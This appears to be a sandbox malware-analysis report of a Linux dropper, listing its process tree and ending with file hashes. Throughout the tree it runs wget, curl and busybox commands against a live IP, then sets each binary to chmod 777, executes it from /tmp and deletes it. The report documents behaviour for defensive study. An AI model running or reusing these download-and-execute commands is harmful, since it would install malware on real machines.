-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:942
-
-
/bin/chmodchmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:950
-
-
/bin/rmrm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:954
-
-
/bin/chmodchmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:960
-
-
/bin/chmodchmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:966
-
-
/bin/chmodchmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:972
-
-
/bin/chmodchmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:978
-
-
/bin/chmodchmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97